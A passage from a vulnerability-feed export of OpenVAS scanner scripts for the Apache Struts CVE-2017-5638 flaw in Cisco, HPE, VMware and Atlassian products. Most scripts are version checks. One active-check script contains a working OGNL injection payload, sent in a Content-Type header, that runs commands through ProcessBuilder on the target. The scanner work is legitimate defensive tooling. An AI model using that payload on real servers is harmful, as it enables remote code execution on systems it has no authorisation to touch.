test_version: \"2.10.1\", test_version2: \"2.10.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.10.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"2.11.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.11.1\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-26T15:41:09", "description": "Apache Struts is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2017-03-08T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution Vulnerability (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2020-06-25T00:00:00", "id": "OPENVAS:1361412562310140180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts Remote Code Execution Vulnerability (Active Check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140180\");\n script_version(\"2020-06-25T07:01:49+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-25 07:01:49 +0000 (Thu, 25 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-08 12:19:09 +0100 (Wed, 08 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_name(\"Apache Struts Remote Code Execution Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"gb_vmware_vcenter_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-045\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue may allow an attacker to execute arbitrary\n code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP POST request.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for\n more information.\");\n\n script_tag(name:\"summary\", value:\"Apache Struts is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nport = http_get_port( default:80 );\nhost = http_host_name( dont_add_port:TRUE );\n\nurls = make_list( );\n\nforeach ext( make_list( \"action\", \"do\", \"jsp\" ) ) {\n exts = http_get_kb_file_extensions( port:port, host:host, ext:ext );\n if( exts && is_array( exts ) ) {\n urls = make_list( urls, exts );\n }\n}\n\nif( get_kb_item( \"VMware_vCenter/installed\" ) )\n urls = make_list( \"/statsreport/\", urls );\n\ncmds = exploit_commands();\n\nx = 0;\n\nvt_strings = get_vt_strings();\n\nforeach url ( urls )\n{\n bound = vt_strings[\"default_rand\"];\n\n data = '--' + bound + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"' + vt_strings[\"default\"] + '\"; filename=\"' + vt_strings[\"default\"] + '.txt\"\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n vt_strings[\"default\"] + '\\r\\n' +\n '\\r\\n' +\n '--' + bound + '--';\n\n foreach cmd ( keys( cmds ) )\n {\n c = \"{'\" + cmds[ cmd ] + \"'}\";\n\n ex = \"%{(#\" + vt_strings[\"default\"] + \"='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):\" +\n \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.\" +\n \"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:33", "description": "Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310106646", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106646", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucmim_cisco-sa-20170310-struts2.nasl 13999 2019-03-05 13:15:01Z cfischer $\n#\n# Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106646\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13999 $\");\n\n script_name(\"Cisco Unified Communications Manager IM and Presence Service Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager IM and Presence Service is prone to a\n vulnerability in Apache Struts2.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 14:15:01 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucmim_version.nasl\");\n script_mandatory_keys(\"cisco/cucmim/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:55", "description": "Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.", "cvss3": {}, "published": "2017-03-15T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Struts2 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106652", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106652", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Atlassian Bamboo Struts2 RCE Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106652\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 11:39:14 +0700 (Wed, 15 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Atlassian Bamboo Struts2 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Atlassian Bamboo is prone to a remote code execution vulnerability in\nStruts2.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Bamboo uses a version of Struts 2 that is vulnerable to CVE-2017-5638.\nAttackers can use this vulnerability to execute Java code of their choice on the system.\");\n\n script_tag(name:\"affected\", value:\"Atlassiona Bamboo 5.1 until 5.14.4, 5.15.0 until 5.15.2.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.14.5, 5.15.3 or later.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-18242\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"5.1.0\", test_version2: \"5.14.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.14.5\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"5.15.0\", test_version2: \"5.15.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.15.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 